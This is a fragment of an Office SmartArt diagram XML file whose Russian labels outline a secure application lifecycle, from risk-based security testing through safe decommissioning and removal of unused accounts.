      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{436ACC70-9A3F-496B-A85D-CF77D7FC7207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"штатное" и "нештатное" использование технических и производственных возможностей.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{97196C37-2225-4EC0-AD9D-ED9EDDE36B2E}" type="parTrans" cxnId="{D65047F2-7ED0-4B12-AB6C-8717B38C49DE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5B6FED2A-CCAD-4150-BE86-460500775F70}" type="sibTrans" cxnId="{D65047F2-7ED0-4B12-AB6C-8717B38C49DE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9654840-CCA9-475F-8026-A0CB36AC23A9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Организуйте тестирование безопасности в соответствии с внутренними процессами, требованиями защиты и предполагаемым уровнем опасности для каждого приложения.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3E0B7461-5330-4740-AF6F-42E7B3BEFEFB}" type="parTrans" cxnId="{2AE97330-074B-4EBD-B20E-409131B4C40C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1D675F40-F864-4B2E-B6E2-C9D29AFA9020}" type="sibTrans" cxnId="{2AE97330-074B-4EBD-B20E-409131B4C40C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{080DE4A9-31B3-4529-9CA3-FC30B3D31A77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Введите приложение в эксплуатацию и перестаньте использовать старые приложения при необходимости.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{899E3CF7-9D0C-4165-A610-81A1077E783C}" type="parTrans" cxnId="{48311AAE-790D-405B-BEB3-7AB59042F49A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9AA1C047-7E86-43E3-AA24-C92B3BC7E34B}" type="sibTrans" cxnId="{48311AAE-790D-405B-BEB3-7AB59042F49A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8A13AC1-43D9-4BE9-9345-EBD28ED64723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Согласуйте всю документацию, а также базу данных контроля изменений и архитектуру безопасности.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E70C6DAC-1356-44C0-BCA2-24EFFF5743FE}" type="parTrans" cxnId="{DCD9FF7A-C041-457B-8A4D-32904C98C1F4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{585354FF-8734-42ED-AE1D-8349C73E2B59}" type="sibTrans" cxnId="{DCD9FF7A-C041-457B-8A4D-32904C98C1F4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D7D751B1-9789-48D6-A3D2-88F4CB3AE9C9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Обратите внимание пользователей на безопасность, а также найдите компромисс между практичностью и безопасностью.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{36639052-9A6E-47C7-A020-F81AA12F1A3C}" type="parTrans" cxnId="{EE369573-7275-4190-A508-8493472AD3CB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1887D76E-BF0A-4F02-9071-53896CF7538A}" type="sibTrans" cxnId="{EE369573-7275-4190-A508-8493472AD3CB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60779E52-CC5F-4109-9E02-C8F73324C37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проведите модификации, например переход на новую версию приложения или использование других компонентов (ОС, ПО или библиотек).</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C494CE06-D836-41D9-ADFD-898F15E5786C}" type="parTrans" cxnId="{49821016-59B2-49A9-8B65-5A27F6D118C2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A8D486C-9838-4EFE-BEDB-F072BF324AD0}" type="sibTrans" cxnId="{49821016-59B2-49A9-8B65-5A27F6D118C2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA8034F6-E027-4D76-A5F9-70FE299619D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Обновите документацию, включая документацию по контролю изменений, архитектуре безопасности, элементам управления и мерам противодействия, а также документацию по текущим задачам или проектам.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F121DD58-051E-4186-B611-30AF12D23895}" type="parTrans" cxnId="{B98CA423-6056-48A5-8715-E2F822D9E61B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{816CF6D5-3121-49C6-98A5-77CE40307EFF}" type="sibTrans" cxnId="{B98CA423-6056-48A5-8715-E2F822D9E61B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6CD4BB62-D241-46BC-9B32-86E2CC12748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9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Осуществите безопасный вывод приложения из эксплуатации, включая удаление неиспользуемых учетных записей, а также ролей и разрешений.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D2D2A06B-5339-4194-90B5-CCE406438AF1}" type="parTrans" cxnId="{7A90871C-BF2A-4DA1-B67A-F38BED85FC4C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F48BCD57-6AB8-45C6-AF3F-815020533A4D}" type="sibTrans" cxnId="{7A90871C-BF2A-4DA1-B67A-F38BED85FC4C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B0103A81-76F6-40DD-8B7E-FAE3E5F88028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9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Установите приложению статус "выведено из эксплуатации" в БД контроля изменений.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A04D13C9-D9C5-4F60-B4F0-1B363451BF66}" type="parTrans" cxnId="{97452B92-22D7-4E80-B74D-5D72DE542765}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56B4B5BC-D671-4D10-91B2-18BB09341248}" type="sibTrans" cxnId="{97452B92-22D7-4E80-B74D-5D72DE542765}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E38DBA4E-1590-4E8F-92F2-04F18E552021}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr lIns="54000" rIns="36000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57150" indent="-57150">
            <a:lnSpc>
              <a:spcPct val="9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технические возможности и интеграцию с ИТ-архитектурой, а также организуйте бизнес-тестирование.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4707E43C-0E63-42FE-96E7-6097CEC31A66}" type="parTrans" cxnId="{A994FEDD-5A8E-480B-AEF6-E54256EA5D11}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9E962D11-84F0-4781-87CC-1DC58D8334B3}" type="sibTrans" cxnId="{A994FEDD-5A8E-480B-AEF6-E54256EA5D11}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" type="pres">
      <dgm:prSet presAssocID="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="6" custScaleX="45202" custScaleY="82622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ED648348-3383-4156-B7CD-1CB7092349F2}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="6" custScaleX="123722" custScaleY="103652">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" type="pres">
      <dgm:prSet presAssocID="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="6" custScaleX="45202" custScaleY="9850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29555282-7DBF-4954-82C2-561252AD070F}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="6" custScaleX="123722" custScaleY="110001">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" type="pres">
      <dgm:prSet presAssocID="{D22B1E2D-9241-472F-8A9E-565E70887137}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="6" custScaleX="45202" custScaleY="98610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55C0F19-ACD0-452E-8743-4A25E747654D}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="6" custScaleX="123722" custScaleY="123089">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" type="pres">
      <dgm:prSet presAssocID="{35F82638-1CE8-4F68-915D-3475E1D94C1A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6FA43676-E617-4D34-8266-D87F1E87C4E7}" type="pres">
      <dgm:prSet presAssocID="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}" type="pres">
      <dgm:prSet presAssocID="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="6" custScaleX="47201" custScaleY="12096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992D08B6-B207-435B-A893-D17B49418ACB}" type="pres">
      <dgm:prSet presAssocID="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="6" custScaleX="123722" custScaleY="144855">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{7F2930EF-2282-4737-B8ED-0133EE5AB8BC}" type="pres">
      <dgm:prSet presAssocID="{A1D63F8A-2B07-42DD-981B-5171E6B8B8C1}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" type="pres">
      <dgm:prSet presAssocID="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}" type="pres">
      <dgm:prSet presAssocID="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" presName="parentText" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="6" custScaleX="45202" custScaleY="101258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0BBDD660-3A49-4256-9C52-69675972DDC1}" type="pres">
      <dgm:prSet presAssocID="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="6" custScaleX="123722" custScaleY="126286">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{78713489-5D47-416E-ADAE-302406F812AE}" type="pres">
      <dgm:prSet presAssocID="{3AEE799B-7F35-4AE2-93E2-335733E35922}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E79E6DD2-6894-4112-AB66-CD4805875FED}" type="pres">
      <dgm:prSet presAssocID="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{50CC931A-2802-4A28-B17D-4CFEC4144601}" type="pres">
      <dgm:prSet presAssocID="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" presName="parentText" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="6" custScaleX="45202" custScaleY="6209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80FA0B1-2C5B-4040-953D-4B7309BF6238}" type="pres">
      <dgm:prSet presAssocID="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="5" presStyleCnt="6" custScaleX="123722" custScaleY="6209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FC5E301-BDE4-4D4C-B6FC-1C26EB94D275}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{38353036-4B60-4F8B-ACD2-5B049C807A9A}" srcOrd="2" destOrd="0" parTransId="{73A5B6BE-984C-43D5-83D1-70267B05EA9B}" sibTransId="{514DE64B-2054-4928-808C-6A92FFA3AA8E}"/>
    <dgm:cxn modelId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" srcOrd="1" destOrd="0" parTransId="{69CA534A-D7C1-40A6-A52D-08C1C25C2AF2}" sibTransId="{D22B1E2D-9241-472F-8A9E-565E70887137}"/>
    <dgm:cxn modelId="{9FCAC402-6721-43DD-BDB5-30970CCF9503}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{495252AF-5996-4B38-A1EE-B648650A10A0}" srcOrd="3" destOrd="0" parTransId="{5602DF29-E513-4B50-B37A-05F44A5B2860}" sibTransId="{F126DBDA-495B-4894-915F-3153C0E98C12}"/>
    <dgm:cxn modelId="{68D71606-5C52-434C-93A7-B1ED203D82B8}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" srcOrd="0" destOrd="0" parTransId="{0B3561F2-F580-4BA5-B06C-3004CD728F94}" sibTransId="{2CCD953C-110F-4B11-9CBE-349755B93BC6}"/>
    <dgm:cxn modelId="{D9FCC50C-93E6-8543-8CA8-74A149D1BCEF}" type="presOf" srcId="{CA8034F6-E027-4D76-A5F9-70FE299619D0}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B954E30F-1609-3843-ADCB-3E43BE2A335B}" type="presOf" srcId="{FB9F0EAE-C91F-4A65-B43A-46392ED38733}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{630BF613-79F8-428F-8964-E241E474DFB8}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{247D57F2-8E57-4FE8-BC5D-1538DE9C7ED2}" srcOrd="0" destOrd="0" parTransId="{AE4D7BED-3056-429A-A072-E4C06F9FCBBF}" sibTransId="{FFAF3F5C-16AC-4210-8AC4-B4A3C7CC1B6C}"/>
    <dgm:cxn modelId="{A4BCFA15-B570-475E-8076-E0DF9219BD56}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" srcOrd="4" destOrd="0" parTransId="{F7BEB89D-4E4B-4D2E-BAF8-791B6EF09E28}" sibTransId="{3AEE799B-7F35-4AE2-93E2-335733E35922}"/>
    <dgm:cxn modelId="{49821016-59B2-49A9-8B65-5A27F6D118C2}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{60779E52-CC5F-4109-9E02-C8F73324C37D}" srcOrd="2" destOrd="0" parTransId="{C494CE06-D836-41D9-ADFD-898F15E5786C}" sibTransId="{5A8D486C-9838-4EFE-BEDB-F072BF324AD0}"/>
    <dgm:cxn modelId="{7A90871C-BF2A-4DA1-B67A-F38BED85FC4C}" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{6CD4BB62-D241-46BC-9B32-86E2CC12748D}" srcOrd="1" destOrd="0" parTransId="{D2D2A06B-5339-4194-90B5-CCE406438AF1}" sibTransId="{F48BCD57-6AB8-45C6-AF3F-815020533A4D}"/>
    <dgm:cxn modelId="{B98CA423-6056-48A5-8715-E2F822D9E61B}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{CA8034F6-E027-4D76-A5F9-70FE299619D0}" srcOrd="3" destOrd="0" parTransId="{F121DD58-051E-4186-B611-30AF12D23895}" sibTransId="{816CF6D5-3121-49C6-98A5-77CE40307EFF}"/>
    <dgm:cxn modelId="{2C4DE126-1622-B542-B5B7-F903C68B00EA}" type="presOf" srcId="{719FD505-9C05-4301-8C8D-24A4329404ED}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{62404027-5448-4393-9E79-DA90FB84286A}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{7973B29C-5A9A-4A2C-B276-581656BFB1EE}" srcOrd="3" destOrd="0" parTransId="{F5BE4E3D-749F-4DF5-916A-F051FA94842E}" sibTransId="{03388AB2-B7BD-4A7D-8228-58066747E14F}"/>
    <dgm:cxn modelId="{2AE97330-074B-4EBD-B20E-409131B4C40C}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{B9654840-CCA9-475F-8026-A0CB36AC23A9}" srcOrd="3" destOrd="0" parTransId="{3E0B7461-5330-4740-AF6F-42E7B3BEFEFB}" sibTransId="{1D675F40-F864-4B2E-B6E2-C9D29AFA9020}"/>
    <dgm:cxn modelId="{73D7DA33-1AC9-154A-9321-AECB1A180043}" type="presOf" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{50CC931A-2802-4A28-B17D-4CFEC4144601}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A9F06D3D-AB20-41E4-A679-6932A40B2975}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" srcOrd="5" destOrd="0" parTransId="{95A80FB8-E99D-4B78-9BC2-FB6B67B119BB}" sibTransId="{E1907769-F900-42C4-90C1-8BD2FCEB9830}"/>
    <dgm:cxn modelId="{E95B0A40-6F9D-4D44-9A58-2D2AA34CE3B4}" type="presOf" srcId="{7973B29C-5A9A-4A2C-B276-581656BFB1EE}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8255EB5E-96BA-4033-B0F3-2209D16DC116}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" srcOrd="3" destOrd="0" parTransId="{DB269FA1-9301-43AF-AA70-A9D7CC0462DC}" sibTransId="{A1D63F8A-2B07-42DD-981B-5171E6B8B8C1}"/>
    <dgm:cxn modelId="{D25B1A61-2C17-D045-8BA8-C03D84862479}" type="presOf" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{051F9242-E1E2-2444-B3CE-725EAD7E4065}" type="presOf" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3C1E9E46-D915-461C-BCC6-0B4F63780CB5}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{64E29A9E-D7A3-4691-83A1-965007B0BD76}" srcOrd="0" destOrd="0" parTransId="{09E61F83-0B7F-450A-8267-AC41E419DB2F}" sibTransId="{2FA6E4AA-CA8D-4524-8451-A2B7B829BDA4}"/>
    <dgm:cxn modelId="{683E9267-0B08-6441-992E-63D946C0693E}" type="presOf" srcId="{080DE4A9-31B3-4529-9CA3-FC30B3D31A77}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{ECCFEE6A-CB8C-2F46-BC79-A83695AE02BC}" type="presOf" srcId="{E38DBA4E-1590-4E8F-92F2-04F18E552021}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{73C5906B-EA19-B945-B093-0E76B3BEC843}" type="presOf" srcId="{B0103A81-76F6-40DD-8B7E-FAE3E5F88028}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{BF55056D-FA90-AB44-9E77-172DB6E9FFE8}" type="presOf" srcId="{64E29A9E-D7A3-4691-83A1-965007B0BD76}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A40ED050-BDA1-BA44-9165-1409C092BD58}" type="presOf" srcId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EE369573-7275-4190-A508-8493472AD3CB}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{D7D751B1-9789-48D6-A3D2-88F4CB3AE9C9}" srcOrd="1" destOrd="0" parTransId="{36639052-9A6E-47C7-A020-F81AA12F1A3C}" sibTransId="{1887D76E-BF0A-4F02-9071-53896CF7538A}"/>
    <dgm:cxn modelId="{DCD9FF7A-C041-457B-8A4D-32904C98C1F4}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{C8A13AC1-43D9-4BE9-9345-EBD28ED64723}" srcOrd="5" destOrd="0" parTransId="{E70C6DAC-1356-44C0-BCA2-24EFFF5743FE}" sibTransId="{585354FF-8734-42ED-AE1D-8349C73E2B59}"/>
    <dgm:cxn modelId="{B663EA81-9240-5F43-A148-92ACDFE7CC44}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0957F586-5356-EF45-966C-128E7F7AB956}" type="presOf" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
